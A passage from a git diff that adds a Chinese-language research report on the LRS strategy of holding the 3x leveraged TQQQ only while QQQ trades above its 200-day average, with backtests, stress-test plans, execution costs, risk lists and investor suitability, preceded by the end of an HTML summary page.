  • 优势来自规则化仓位与空仓纪律;代价是回撤仍可能很深、且依赖市场出现可识别的趋势段。
  • +
+
+
+ +
+
+
+ 人群 + 更适合谁 +
+
+
    +
  • 能承受较大净值波动、接受杠杆工具约束的投资者。
  • +
  • 愿意严格执行信号、减少主观干预的执行者。
  • +
  • 若睡眠与现金流会被净值牵动,应降低杠杆占比或不用此类工具。
  • +
+
+
+
+ +
+
+
+
+ 落地 +

五步决策清单

+
+
+
+
    +
  1. 明确可承受的最大回撤与投资期限,反推是否允许持有 TQQQ 类资产。
  2. +
  3. 读完 Ch.04 压力测试:能否接受滚动窗口与参数敏感性所揭示的方差。
  4. +
  5. 写下入场、加仓、减仓规则(与策略 Step 对齐),并承诺不在盘中临时改写。
  6. +
  7. 评估执行渠道:佣金、滑点、税务与是否能在信号日完成操作。
  8. +
  9. 设复盘频率(季/年),用过程指标(纪律执行率)而非单日盈亏评价策略。
  10. +
+
+
+
+ + + diff --git a/docs/LRS_notebooks/research/LRS_TQQQ_研究报告.md b/docs/LRS_notebooks/research/LRS_TQQQ_研究报告.md new file mode 100644 index 0000000..e5a3124 --- /dev/null +++ b/docs/LRS_notebooks/research/LRS_TQQQ_研究报告.md @@ -0,0 +1,374 @@ +# LRS TQQQ 策略深度研究 + +--- + +# 一、研究动机:为什么要研究这个策略? + +--- + +## 1.1 TQQQ的收益潜力与持有风险的矛盾 + +TQQQ是ProShares推出的纳斯达克100指数3倍做多杠杆ETF,在牛市环境下,其收益表现极为惊人——2010年至2024年间,TQQQ的累计涨幅远超QQQ本身十倍以上。这种收益弹性对投资者有着天然的吸引力,似乎只需买入持有便能坐享复利奇迹。然而,杠杆的本质是双向放大:当QQQ在2022年下跌35%时,TQQQ的跌幅超过75%;从-75%恢复至原始本金,需要账户涨幅达到300%。这意味着一次重大熊市足以让长期持有者陷入数年无法回本的困境,甚至在心理和资金层面被迫止损离场,永久锁死亏损。这种"收益诱人、风险致命"的特性,构成了研究TQQQ主动管理策略的根本动机。 + +- TQQQ = QQQ日收益率 × 3,牛市弹性极强 +- 但熊市跌幅同样被放大3倍,QQQ -35% → TQQQ -75%+ +- 从-75%回本需要涨300%,复利修复周期极长 +- 长期持有TQQQ面临"一次熊市抹平多年收益"的系统性风险 +- 主动管理的必要性:如何保留上涨弹性,同时规避下行摧毁性 + +--- + +## 1.2 杠杆ETF的波动损耗机制(Volatility Decay) + +杠杆ETF存在一个被大多数普通投资者忽视的结构性缺陷——波动损耗(Volatility Decay),又称"复利侵蚀"。其核心在于:杠杆ETF追踪的是每日收益率的固定倍数,而非长期价格的固定倍数。以一个简单例子说明:若QQQ某日下跌10%,次日上涨10%,则QQQ净值恢复至99%,损失仅1%;而TQQQ对应为第一天跌30%、第二天涨30%,净值变为0.7 × 1.3 = 0.91,损失高达9%。这9%的损耗并非由市场趋势造成,而纯粹来自波动本身。在震荡市或频繁涨跌的环境中,这种损耗会持续累积,使得TQQQ即便在QQQ基本持平的情况下,也会出现显著的净值侵蚀。这一机制从数学层面证明了:无法长期持有TQQQ,必须对市场方向进行有效过滤。 + +- 杠杆ETF追踪**每日**收益率倍数,而非长期价格倍数 +- 数学示例:QQQ -10% +10% → 净值99%;TQQQ -30% +30% → 净值91% +- 波动越大、震荡越频繁,损耗积累越严重 +- 即使QQQ长期持平,TQQQ也可能持续亏损 +- 结论:**在震荡或下行市场持有TQQQ是数学上的必输游戏**,必须引入方向性过滤机制 + +--- + +## 1.3 LRS策略的出现背景 + +正是基于对波动损耗的认识,学界和实践者开始探索通过趋势信号主动管理TQQQ持仓的方法。LRS(Leverage Rotation Strategy)策略的核心洞察在于:与其试图预测市场走向,不如用客观的价格信号判断当前市场趋势的方向,在上升趋势中持有杠杆工具享受放大收益,在趋势转弱时退出持仓规避杠杆的放大亏损。移动均线作为最经典的趋势跟踪指标,提供了一种简单、客观、可执行的过滤机制。相比主观择时,基于规则的系统性策略消除了情绪干扰,使投资者能够在市场剧烈波动时依然按照预设逻辑执行操作。LRS策略的价值假设,本质上是一个对"趋势具有延续性"这一市场特征的下注。 + +- 学界与实践者的共同问题:如何利用TQQQ的高弹性,同时规避其结构性缺陷 +- 解题思路:引入趋势信号作为持仓过滤器,而非主观预测 +- 移动均线提供客观、可量化、可回测的进出场依据 +- 基于规则的系统性策略,消除情绪驱动的错误操作 +- 核心假设:**市场趋势具有一定延续性**——这既是策略的基础,也是其最大的风险来源 + +--- +--- + +# 二、策略机制:LRS是什么,如何运作 + +--- + +## 2.1 核心规则:QQQ 200日均线信号 + +LRS策略的操作规则极为简洁,完全由QQQ的200日移动均线驱动。200日均线代表过去约10个月的平均收盘价,是市场参与者普遍认可的中长期趋势分界线。规则如下:当QQQ的收盘价处于200日均线上方时,判定市场处于中长期上升趋势,此时买入并持有TQQQ;当QQQ收盘价跌破200日均线时,判定趋势转弱,立即卖出TQQQ并转持现金或稳健资产,等待下一次信号。策略不做预测,不看新闻,不受情绪驱动,完全由这一条价格规则决定所有操作。这种极简的设计使得策略具有高度可复制性和可执行性,同时也意味着任何主观干预都会破坏其逻辑完整性。 + +- **买入信号**:QQQ收盘价 > 200日移动均线 → 持有TQQQ +- **卖出信号**:QQQ收盘价 < 200日移动均线 → 清仓,持有现金 +- 200日均线 = 过去约10个月均价,业界公认的中长期趋势判断基准 +- 信号完全客观,零主观判断,100%基于价格数据 +- 操作标的为TQQQ(3倍杠杆),信号来源为QQQ(非杠杆母指数) + +--- + +## 2.2 策略的理论假设 + +任何策略的有效性都建立在一系列假设之上,LRS策略同样如此。其核心假设有三层:第一,趋势具有延续性——当市场处于上升趋势时,上涨的概率高于反转的概率,反之亦然;第二,200日均线能够有效区分趋势与噪音——短期波动不会频繁触发信号,只有中长期趋势转变才会改变持仓;第三,TQQQ的3倍杠杆在上升趋势中产生的超额收益,足以补偿在假突破信号下的摩擦损耗。这些假设在历史数据中得到了不同程度的验证,但并非在所有市场环境下均成立——在震荡市中,趋势延续性假设会频繁失效,导致均线被反复穿越,产生大量无效信号。理解这些假设的边界条件,是评估策略未来有效性的关键。 + +- **假设一**:市场趋势具有延续性,上涨趋势中继续上涨的概率大于反转 +- **假设二**:200日均线能有效过滤短期噪音,只响应中长期趋势转变 +- **假设三**:趋势期内TQQQ的杠杆收益 > 假信号带来的摩擦成本 +- 假设在趋势型市场(2022年熊市、2013-2015牛市)中成立 +- 假设在震荡市(2015-2016、2010-2012部分区间)中容易失效 +- **策略的有效边界 = 趋势延续性假设的成立范围** + +--- + +## 2.3 策略试图解决的核心问题 + +对比纯粹持有TQQQ,LRS策略本质上是在做一个结构性的取舍:主动放弃部分牛市收益,换取对熊市灾难性损失的系统性规避。在一个完整的市场周期中,TQQQ持有者在上涨阶段享有全部的3倍杠杆收益,但在下跌阶段同样承受全部的3倍放大亏损;而LRS策略持有者,在上涨阶段同样拿到接近全部的TQQQ涨幅(信号切换有轻微滞后),但在熊市阶段通过撤出持仓,将3倍放大的下行风险转化为接近零的仓位损失。两者的本质差异体现在复利路径上:规避一次-75%的深度回撤,比多获得50%的牛市收益对长期财富的贡献更大。LRS策略的价值,不在于每一段时间都跑赢市场,而在于通过控制下行来保护复利的持续性。 + +- 纯TQQQ持有:完整享受3倍杠杆上涨,同时完整承受3倍杠杆下跌 +- LRS策略:接近完整享受上涨弹性,系统性规避下行放大风险 +- 策略的核心价值在于**保护复利路径**,而非每段区间都跑赢 +- 数学逻辑:避免-75%回撤的价值 >> 牛市中少赚的部分收益 +- 代价:在震荡市和快速V型反弹中会产生无效信号和踏空成本 +- 本质是一种**非对称风险管理工具**,而非单纯的收益增强策略 + +--- +--- + +# 三、基础回测:策略表现如何 + +--- + +## 3.1 回测结果概览 + +在建立对策略的基本认识之后,最直接的验证方式是将其放入历史数据中观察表现。本节使用五个时间窗口对LRS策略进行回测,初始资金统一设为$10,000,基准对比为QQQ买入持有策略。五个时间段覆盖了近期强势牛市(近2年、近3年)、包含2022年熊市的中期周期(近5年),以及更早期的历史区间(2015-2020、2010-2015),基本涵盖了近15年内主要的市场结构类型。核心指标包括总收益率、最终资产规模、最大回撤、交易次数与胜率、以及假突破(Whipsaw)次数。 + +- 近2年:LRS +22.6% vs QQQ +44.7%,最大回撤 -15.2%,3次交易,胜率100%,Whipsaw 0 +- 近3年:LRS +80.8% vs QQQ +105.4%,最大回撤 -23.1%,3次交易,胜率100%,Whipsaw 0 +- 近5年:LRS +178.7% vs QQQ +94.8%,最大回撤 -32.9%,4次交易,胜率100%,Whipsaw 0 +- 2015–2020:LRS +305.9% vs QQQ +220.4%,最大回撤 -50.5%,8次交易,胜率25%,Whipsaw 0 +- 2010–2015:LRS +52.0% vs QQQ +177.6%,最大回撤 -42.5%,14次交易,胜率29%,Whipsaw 4 + +> **📊 图表 A:回测汇总对比表** +> 制作一张完整横向对比表,行为五个回测区间,列为:总收益率(LRS / QQQ B&H)、最终资产、最大回撤、交易次数、胜率、Whipsaw次数。用绿色高亮LRS跑赢的单元格,红色标注跑输的单元格。 + +> **📊 图表 B:总收益率分组柱状图** +> X轴为五个时间段,Y轴为总收益率(%)。每个时间段并排放两根柱:LRS(蓝)和QQQ B&H(灰)。视觉重点是"时间维度的翻转":短期LRS跑输,中长期LRS跑赢。 + +--- + +## 3.2 风险调整指标 + +单纯比较总收益率是不够的,因为它没有反映获取这些收益所承担的风险。一个策略如果收益高但波动极大,在实际执行中很可能因为无法承受中途回撤而被放弃。本节引入三个风险调整指标对策略进行更完整的评估。夏普比率(Sharpe Ratio)衡量每承担一单位风险所获得的超额收益,是最广泛使用的风险调整收益指标;卡玛比率(Calmar Ratio)衡量年化收益与最大回撤的比值,直接反映策略在最坏情况下的效率;最大回撤曲线则直观展示账户在历史上的最深"水下"状态。需要注意的是,LRS的最大回撤在部分区间(如2015-2020的-50.5%)仍然相当可观,说明该策略并非低风险工具,而是一个试图优化收益路径的非对称工具。 + +- **Sharpe Ratio**:(年化收益率 CAGR - 无风险利率)/ 年化波动率 + - 无风险利率:美国3个月国债收益率,统一取4%作为历史基准 + - 年化波动率 = 每日收益率的标准差 × √252 + - Sharpe > 1 视为良好,> 2 视为优秀 +- **Calmar Ratio**:CAGR / |最大回撤|,越高越好;≥ 1.0 说明年收益可覆盖一次最大回撤 +- **对比基准**:LRS vs QQQ B&H vs TQQQ B&H vs SPY B&H,体现杠杆策略在风险调整后的相对价值 +- LRS在包含熊市的区间(近5年、2015-2020)Sharpe应显著高于TQQQ B&H +- LRS在纯牛市区间(近2年)Sharpe可能低于QQQ B&H,但仍优于TQQQ B&H + +> **📊 图表 C:Sharpe Ratio 分组柱状图** +> X轴为五个时间段,Y轴为Sharpe Ratio。每段并排三根柱:LRS、QQQ B&H、TQQQ B&H。用水平虚线标注 Sharpe = 1 参考线。预期结论:含熊市区间LRS的Sharpe显著高于TQQQ B&H,体现风险调整优势。 + +> **📊 图表 D:最大回撤对比横向条形图** +> 用负值横向条形图(向左延伸)展示各策略各时间段的最大回撤,颜色越深代表回撤越大。重点让读者看到:LRS虽然规避了部分回撤,但-50.5%仍然是极高的心理压力,执行难度不容忽视。 + +> **📊 图表 E:账户净值走势曲线(近5年)** +> X轴为时间,Y轴为账户净值($10,000起)。同一图上画三条线:LRS(蓝)、QQQ B&H(灰)、TQQQ B&H(橙)。2022年熊市区间用浅红色背景标注,信号切换点(入场/出场)用小三角标注,直观展示LRS在2022年的规避效果与整体路径差异。 + +--- + +## 3.3 不同市场结构下的分类表现 + +上述回测结果已经隐含了一个重要规律:策略的表现与当时的市场结构高度相关。为了更系统地验证这一点,本节将历史数据按市场结构进行分类,分别分析LRS在四种典型环境下的表现:趋势牛市(缓慢持续上涨)、趋势熊市(缓慢持续下跌)、震荡市(反复穿越均线)、以及V型急跌(快速暴跌后快速反弹)。这四种结构对应完全不同的策略表现预期,也是评估策略未来适用性的关键框架。历史数据中,2013-2015和2023-2024属于趋势牛市;2022年属于典型的趋势熊市;2015-2016和2010-2012部分区间属于震荡市;2020年3月和2018年Q4属于V型急跌。 + +- **趋势牛市**(如2013-2015):均线信号稳定,少有触发,策略长期满仓TQQQ,收益贴近TQQQ B&H +- **趋势熊市**(如2022全年):策略早期出场,规避TQQQ -75%的主要跌幅,是LRS最大优势的来源 +- **震荡市**(如2015-2016、2010-2012):价格反复穿越均线,产生大量假信号,频繁小亏积累磨损 +- **V型急跌**(如2020年3月、2018Q4):跌速超过均线反应速度,来不及出场;反弹时重新入场可能踏空初段涨幅 +- 策略设计天然偏向"趋势延续"的市场,在"趋势快速反转"的环境中存在结构性劣势 + +> **📊 图表 F:市场结构分类热力图** +> 矩阵表:行为四种市场结构(趋势牛市 / 趋势熊市 / 震荡市 / V型急跌),列为关键指标(相对QQQ超额收益评级、Whipsaw次数、Sharpe贡献评级)。颜色编码:深绿 = LRS明显优于持有,深红 = LRS明显劣于持有,黄色 = 基本持平。读者应能5秒内看出:LRS最擅长熊市,最怕震荡市和V型急跌。 + +> **📊 图表 G:历史信号时间轴(2010–2025)** +> X轴为时间,Y轴为QQQ价格(对数坐标)。画出QQQ走势线与200日均线,绿色区域标注"持有TQQQ"时段,红色区域标注"空仓现金"时段,每次信号切换点标注"入场"或"出场"。这是整章最直观的可视化,让读者直接看到策略在15年历史中的实际操作节奏与市场节点的对应关系。 + +--- +--- + +# 四、质疑与压力测试:过去的表现能否代表未来 + +--- + +## 4.1 历史数据的局限性 + +第三章的回测结果看起来令人满意,但在做出任何实际决策之前,有必要正视这些数据本身的边界。任何回测都存在"事后诸葛亮"的内在局限:我们用已知的历史去验证一个策略,而市场不会完全重复历史。具体到LRS策略,有三个局限尤其值得警惕。第一,TQQQ成立于2010年2月,因此2010年之前的回测数据均为模拟数据(用QQQ日收益率×3计算),而模拟数据无法反映真实的流动性、跟踪误差和极端行情下的ETF折溢价问题。第二,目前的五个回测窗口并未系统性地覆盖所有市场结构,特别是2000-2002年科技股崩盘(QQQ跌幅超80%)这种极端熊市缺乏真实数据验证。第三,回测期间使用的是收盘价信号,实际执行时存在滑点和延迟,尤其在市场剧烈波动时信号触发与实际成交之间的偏差不可忽视。 + +- TQQQ 2010年2月才成立,此前数据均为模拟,缺乏真实流动性与市场摩擦的验证 +- 2000-2002年QQQ -80%的极端熊市未被覆盖,是回测的最大空白 +- 回测使用收盘价信号,实际执行存在隔日成交的滑点成本 +- 回测假设资金可以整存整取,忽略了税务、账户限制等现实约束 +- **核心问题**:过去15年恰好包含了一次"对策略最友好"的熊市(2022年),这是结论的最大不确定性来源 + +--- + +## 4.2 宏观层面的稳健性检验 + +即便历史数据看起来支持这个策略,我们也需要追问:未来的市场环境是否与历史相似?LRS策略的有效性建立在"趋势具有延续性"这一假设上,而这一假设在不同宏观环境下成立的概率并不相同。低利率、流动性宽松的环境(如2010-2021年)倾向于制造缓慢上涨的趋势牛市,是均线策略最理想的温床;而高利率、政策剧烈转向的环境(如2022年加息周期)则可能产生快速且剧烈的市场波动,使均线信号滞后性暴露。此外,地缘政治冲击、监管政策变化(特别是针对杠杆ETF的潜在限制)、以及算法交易普及后市场微观结构的变化,都可能从根本上改变趋势信号的有效性。因此,宏观环境的判断应作为策略执行的前提背景,而非可以忽略的变量。 + +- **低利率宽松环境**(2010-2021):流动性充裕,趋势延续性强,均线策略效果显著 +- **高利率紧缩环境**(2022-2024):政策驱动的快速轮动,均线信号滞后性更明显 +- **市场结构变化**:算法交易占比提升,短期价格波动加剧,可能增加均线穿越频率 +- **产品层面风险**:美国SEC曾多次讨论限制杠杆ETF,监管变化可能直接影响TQQQ可用性 +- **地缘政治与黑天鹅**:非经济因素引发的V型急跌无法被趋势信号预判,是不可消除的尾部风险 + +> **📊 图表 H:宏观周期与策略表现对照表** +> 将历史分为三个宏观阶段:宽松低利率期(2010-2021)、紧缩高利率期(2022-2023)、政策不确定期(2024-至今)。对每个阶段标注利率水平、市场波动率(VIX均值)、以及LRS在该阶段的表现评级(优 / 中 / 差)。引导读者思考未来宏观环境更接近哪个阶段。 + +--- + +## 4.3 参数敏感性测试 + +一个真正稳健的策略,其结论不应该对参数的微小调整高度敏感。LRS策略的核心参数只有一个:均线周期(当前为200日)。如果将均线周期从200日改为150日或250日,策略的整体结论是否仍然成立?如果答案是"基本成立",说明策略捕捉的是真实的市场规律;如果答案是"结果大幅改变",则说明200这个数字可能只是在历史数据上过度优化的结果——即"曲线拟合"。此外,还应测试信号触发的确认机制:是否需要价格收盘低于均线持续N天才触发卖出,以减少假突破?这类参数调整虽然会使策略更复杂,但可以揭示策略的真实稳健边界。 + +- **测试变量**:均线周期从100日到300日,每隔25日取一个参数进行完整回测 +- **评估标准**:观察总收益率、最大回撤、Sharpe Ratio随均线周期的变化曲线,若结果平滑则稳健,若有明显峰值则存在过拟合 +- **确认过滤测试**:要求价格连续3日/5日低于均线才触发卖出,观察是否减少Whipsaw +- **信号方向变体**:测试用周线均线替代日线均线,观察信号频率和收益变化 +- **预期结论**:若150-250日均线区间内结论基本一致,说明策略具有真实稳健性;若仅200日附近表现突出,需对策略有效性保持审慎 + +> **📊 图表 I:参数敏感性折线图** +> X轴为均线周期(100日至300日),Y轴分别绘制三条线:总收益率、最大回撤(取绝对值)、Sharpe Ratio。每条线用不同颜色。若三条线在150-250日范围内走势平稳(无明显波峰),说明策略对参数不敏感,结论可信;若存在尖锐峰值,需标注并讨论过拟合风险。 + +--- + +## 4.4 滚动窗口分析 + +固定时间段的回测存在"选择性"问题:不同的起止时间点会产生截然不同的结论。为了避免这一偏差,滚动窗口分析(Rolling Window Analysis)要求对每一个可能的起始日期进行独立回测,观察策略在任意选定时间窗口内的表现分布。具体做法是:以5年为窗口,从2010年起每隔一个月滑动一次,计算每个窗口内的收益率、Sharpe Ratio和最大回撤,形成一个完整的分布区间。这个分布告诉我们:如果某人在历史上任意一天开始执行LRS策略,他在5年后的预期结果是什么范围?结论的分布越窄、越集中在正区间,策略就越稳健;若分布极宽或存在大量负值窗口,则说明策略的结果高度依赖运气(即进入时机)。 + +- 窗口长度建议:3年、5年、7年各做一组,对比窗口长度对结论稳定性的影响 +- 计算每个窗口内LRS相对QQQ B&H的超额收益,形成频率分布直方图 +- 统计指标:超额收益为正的窗口占比、中位数超额收益、最差窗口的表现 +- 若5年窗口中超额收益为正的比例超过65%,可认为策略具有统计意义上的优势 +- **最重要的问题**:在所有历史起点中,有多大比例的投资者最终是赚钱的? + +> **📊 图表 J:滚动5年超额收益分布直方图** +> X轴为LRS相对QQQ B&H的5年超额收益(%),Y轴为频率(窗口数量)。用竖线标注0%位置(超额收益为零的分界线)。直方图向右偏斜(正超额收益占多数)说明策略在历史上对大多数起始时点有效;若分布对称或向左偏斜,说明有效性存疑。 + +--- +--- + +# 五、实战执行层面的微观考量 + +--- + +## 5.1 资金投入方式:一次性 vs 分批定投 + +在决定使用LRS策略之后,面临的第一个实际问题是:如何入场?一次性将全部资金投入(Lump Sum,以下简称LS),还是分批定期买入(Dollar Cost Averaging,以下简称DCA)?在传统投资理论中,如果市场长期上涨,LS在统计上优于DCA,因为资金更早参与市场的复利增长。但LRS策略的特殊性在于,它本身已经包含了一个"信号触发"机制:只有在QQQ价格高于200日均线时才持仓,这意味着入场的时间点已经被策略逻辑部分筛选。在这个前提下,若选择DCA,其实是在"策略已判断为可以持仓"的时段内继续做时间分散,这会稀释策略信号的边界清晰性。另一方面,如果账户资金量较大,LS带来的心理压力可能导致在第一次回撤时出现非理性操作,从而破坏策略执行的纪律性。 + +- **LS适合场景**:资金量小($50,000以下)、心理承受力强、信号刚刚触发且市场处于上涨趋势初期 +- **DCA适合场景**:资金量大、首次执行策略、对波动容忍度低、不确定当前是否处于趋势初期或中期 +- DCA周期建议:不超过3个月,过长的DCA会让大量资金长期滞留在低效的"过渡状态" +- **LRS特有的DCA变体**:每月固定日期判断信号,若信号为买入则当日投入当月计划资金,信号为空仓则暂停投入 +- 核心取舍:LS最大化策略效率,DCA最大化执行心理稳定性,两者各有代价 + +--- + +## 5.2 入场时机:什么时候开始执行策略 + +"什么时候开始"是一个经常被低估的问题。即便策略本身是正确的,在错误的市场阶段开始执行,依然可能在初期遭遇挫折,从而导致过早放弃。从历史数据来看,LRS策略在"熊市结束、均线刚刚重新向上突破"的时刻启动效果最佳,因为此时往往处于一轮新趋势的早期;而在"牛市已经运行多年、均线信号从未触发出场"的时刻启动风险最高,因为下一次熊市到来时,策略的第一个动作就是出场,此前积累的TQQQ浮盈可能受到重大考验。当前市场(2025-2026年)处于政治经济不确定性较高的阶段,均线信号的稳定性相对较弱,是DCA而非LS入场的合理理由。 + +- **最佳入场时机**:QQQ刚刚从均线下方穿越回上方,且穿越发生在一次明显回调之后(而非震荡中的假突破) +- **次优入场时机**:QQQ稳定运行在均线上方一段时间(>30天),趋势方向清晰 +- **高风险入场时机**:QQQ在均线附近反复震荡,信号频繁切换(此时建议等待趋势明朗) +- **可量化的判断辅助**:观察QQQ距200日均线的百分比距离,距离>5%且方向向上,信号稳定性较高;距离<2%,信号处于临界区,入场谨慎 +- 不存在"完美的入场时机",执行纪律比择时更重要——但理解市场阶段有助于设定合理的预期 + +--- + +## 5.3 仓位管理:该占总资产多大比例 + +LRS策略不应作为全部净资产的唯一配置。考虑到TQQQ本身是一个极高波动的杠杆工具,即便有均线策略的保护,策略持仓期间的最大回撤依然可能超过30-50%,这种波动对于承担生活责任的普通投资者来说,在心理和现实层面都难以全仓承受。合理的仓位设置应基于一个核心原则:**即便这部分资金归零,也不影响你的核心生活和财务目标**。在此前提下,将LRS策略定位为资产组合中的"卫星仓位",搭配核心的SPY、QQQ或债券持仓,在控制整体风险的同时保留对高弹性收益的参与。 + +- **保守配置**:LRS仓位占总投资资产的10-20%,其余配置SPY/QQQ/债券,整体波动可控 +- **积极配置**:LRS仓位占30-40%,适合风险承受力强、总资产中有稳定收入来源作为缓冲的投资者 +- **不建议超过50%**:超过一半的资产暴露在TQQQ波动中,一次-75%的回撤将对整体资产产生毁灭性影响 +- 仓位应随生命周期调整:年龄越大、距退休越近,LRS仓位应越低 +- **再平衡机制**:建议每年审视一次仓位比例,若LRS仓位因收益大幅升高(如占比超过目标的150%),应考虑部分止盈并补充核心配置 + +--- + +## 5.4 实际执行成本 + +回测数据是在理想条件下计算的,现实执行中存在若干会侵蚀收益的摩擦成本,在制定预期收益时必须将其纳入考量。最主要的三类成本是:税务成本、交易摩擦成本、以及TQQQ本身的持有成本。税务成本往往是被忽视的最大开支——LRS策略的每一次出场操作,如果产生了盈利,就会触发资本利得税;若持仓不足一年则按普通收入税率征税(美国联邦税率可达37%),这会显著压缩净收益。交易摩擦成本在当前零佣金时代相对较小,但在高波动时期,信号触发时的买卖价差和滑点依然存在。TQQQ的年管理费(费用率约0.95%)也会持续产生隐性成本。 + +- **短期资本利得税**:持仓不足一年的盈利按普通收入税率(最高37%),策略每年交易次数少,但每次盈利金额可能较大 +- **长期资本利得税优化**:若持仓超过一年才触发卖出信号,税率降至0-20%,应尽量在税收优惠账户(如IRA、401k)中执行策略 +- **TQQQ费用率**:约0.95%/年,长期持有会产生可观的累积费用,需从净收益中扣除 +- **滑点成本**:信号通常在收盘后确认、次日开盘执行,若市场跳空开高/低,实际成交价可能与预期有偏差 +- **综合估算**:考虑税务和摩擦成本后,实际净收益可能比回测数据低10-20%,应将此作为"安全边际"折扣 + +--- +--- + +# 六、策略风险清单 + +--- + +## 6.1 市场结构风险 + +LRS策略的核心逻辑建立在"趋势延续"这一市场假设上,而这一假设并不总是成立。当市场进入长期震荡区间时,价格会反复穿越200日均线,每一次穿越都会触发一次买入或卖出信号,而这些信号大多数是无效的"假突破"。在2010-2015年的回测中,14次交易中有10次亏损,4次Whipsaw,这正是震荡市对均线策略最直接的惩罚。更严重的情况是,如果未来市场进入类似1990年代日本股市的长期横盘或缓慢阴跌,LRS策略可能在多年内持续产生小额摩擦损耗,账户净值缓慢被侵蚀,而投资者却难以察觉趋势已经消失。 + +- **震荡市风险**:均线反复被穿越,大量Whipsaw信号,摩擦成本持续积累 +- **慢熊风险**:缓慢阴跌中均线信号可能无法及时触发,持仓期间承受持续小亏 +- **趋势消失风险**:若纳斯达克科技股进入长期估值压缩期,200日均线信号的有效性根本性下降 +- 单一信号依赖:策略只使用一个技术指标,缺乏多维度的市场状态判断能力 +- **历史参照**:2010-2015年(五年内LRS仅+52%,同期QQQ B&H +177.6%)是对此风险最直接的历史警示 + +--- + +## 6.2 杠杆工具风险 + +TQQQ作为3倍杠杆ETF,除了放大收益和亏损之外,本身还携带若干结构性风险,这些风险独立于市场走势而存在。最关键的是**产品连续性风险**:如果TQQQ的资产管理规模(AUM)大幅下降,ProShares有权提前清盘,届时持有者将被强制按净值赎回,这可能发生在极为不利的市场时点。此外,在极端市场波动日(如2020年3月)TQQQ可能出现与理论3倍收益的较大偏差,因为基金需要在日内动态调仓以维持杠杆比率,这在市场流动性枯竭时会产生额外的跟踪误差。监管层面,SEC对杠杆ETF的态度也存在不确定性,未来的监管收紧可能限制产品的使用。 + +- **清盘风险**:若TQQQ规模大幅萎缩,ProShares可能在最差时点强制清盘,投资者被迫赎回 +- **极端日跟踪误差**:在流动性危机日(如2020年3月)TQQQ的实际日收益与3×QQQ存在偏差 +- **隔夜持仓风险**:非交易时段发生的重大事件(地缘政治、财报等)可能导致开盘大幅跳空,策略无法在盘中止损 +- **监管风险**:SEC对杠杆ETF有监管权力,历史上曾多次讨论限制个人投资者购买杠杆产品 +- **费用率侵蚀**:0.95%/年的费用率在长期持有中持续累积,对复利产生隐性拖累 + +--- + +## 6.3 执行行为风险 + +即便策略在回测中表现优秀,现实中最常见的失败原因不是策略本身,而是执行者的行为。均线策略要求投资者在特定时刻无条件执行信号:当QQQ跌破均线时必须卖出,哪怕当天新闻一片看好;当QQQ重新突破均线时必须买入,哪怕刚刚经历了一次亏损出场。人类的情绪系统天然抵制这种机械执行——在熊市底部,恐慌情绪会让人不愿意重新入场;在牛市高峰,贪婪情绪会让人在出场信号出现后犹豫不决,甚至主动"覆盖"策略信号。行为风险无法通过更好的数据或参数优化来解决,它是策略执行中唯一纯粹属于人的变量。 + +- **信号不执行**:在出场信号出现时,因为"感觉市场会反弹"而推迟或拒绝执行 +- **提前入场**:在信号未触发时,因为"感觉底部已到"而提前买入,破坏策略逻辑 +- **回撤中出场**:在策略持仓期间遭遇短期回调时,因为恐慌而在非信号时刻主动卖出 +- **连续亏损后放弃**:在震荡市中经历多次Whipsaw后,对策略失去信心,在最不应该放弃的时刻离场 +- **应对措施**:提前制定书面规则、设置信号提醒工具、在税收优惠账户中执行以降低频繁操作的冲动 + +--- + +## 6.4 尾部风险与黑天鹅 + +LRS策略能够应对大多数趋势性熊市,但对于某些极端情景,策略的保护能力是有限的甚至是无效的。最典型的是V型急跌:市场在数周内急剧下跌30-40%,随即快速反弹,整个过程快于200日均线的反应速度。2020年3月的新冠疫情崩盘就是经典案例——QQQ在33天内下跌了约29%,但随即在几个月内完全收复,均线策略可能在接近低点时出场,并在反弹初段踏空。另一类无法防御的情景是市场闭市或极端流动性危机,届时可能根本无法按信号执行买卖,或者成交价格与信号价格存在巨大偏差。 + +- **V型急跌**:跌速超过均线反应速度,出场时已损失相当部分,反弹时又可能踏空初段 +- **流动性危机**:极端情况下ETF可能出现流动性枯竭,无法按净值成交 +- **系统性崩溃**:类似1929年大崩盘或2008年金融海啸的系统性危机,可能在均线信号生效前已造成灾难性亏损 +- **非市场因素**:账户冻结、经纪商破产、互联网中断等无关市场本身的操作风险 +- **尾部风险的本质**:任何基于历史的策略都无法防御未曾出现过的全新风险情景,这是所有量化策略的共同局限 + +--- +--- + +# 七、总结与个人决策框架 + +--- + +## 7.1 策略的综合评价 + +经过前六章的系统分析,LRS TQQQ策略的全貌已经清晰。它不是一个完美的策略,也不是一个应该被轻易否定的策略,而是一个**在特定条件下具有真实优势、但执行门槛和心理成本都极高**的工具。它的核心价值在于:通过一个客观的趋势信号,避免在杠杆ETF上承受趋势性熊市的毁灭性回撤,从而保护复利路径的连续性。这一价值在2015-2020和近5年的回测中得到了验证。但它的代价同样真实:在震荡市中的持续摩擦损耗、对执行纪律的极高要求、以及永远无法完全规避的尾部风险。理解这个策略,本质上是理解一个关于"你愿意用什么来换取什么"的取舍。 + +- **核心优势**:系统性规避趋势熊市中TQQQ的毁灭性回撤,保护复利路径 +- **核心劣势**:震荡市中高频Whipsaw损耗,纯牛市中相对持有策略的阶段性跑输 +- **策略的有效边界**:在"趋势延续性假设"成立的市场环境中有效,在震荡和V型市场中失效 +- **结论的可信度**:现有回测覆盖了几种主要市场结构,但样本量有限,结论具有参考价值而非决定性证明 +- **一句话评价**:这是一个逻辑自洽、历史数据支持、但未来不确定性不可忽视的非对称策略 + +--- + +## 7.2 适合什么样的投资者 + +不是所有人都适合执行这个策略。基于前面的分析,以下几类特征的投资者更可能从LRS策略中受益,而另一些特征则是明显的风险信号。 + +**较为适合:** +- 有稳定收入来源,LRS账户的资金即便归零也不影响生活质量 +- 能够接受策略在某些年份明显跑输大盘,不会因为短期落后而放弃 +- 愿意严格按信号执行,不受新闻和情绪干扰 +- 账户在税收优惠账户(IRA、Roth IRA)中,可以减少频繁操作的税务成本 +- 投资时间跨度超过5年,有足够的窗口经历完整的市场周期 + +**不太适合:** +- 将这笔资金作为中短期(3年以内)的财务目标储备 +- 对账户回撤极度敏感,浮亏超过20%就会产生强烈的止损冲动 +- 需要依赖这笔资金覆盖生活支出的人 +- 没有能力或意愿定期(至少每周)检查信号状态的投资者 +- 总资产规模较小(如$10,000以下),策略的摩擦成本会显著侵蚀收益 + +--- + +## 7.3 个人决策建议 + +在完成这份研究之后,面对"到底用不用"这个问题,没有一个对所有人都成立的答案。但可以提供一个决策框架,帮助将研究结论落地为个人行动。 + +**决策步骤一:确认资金性质。** 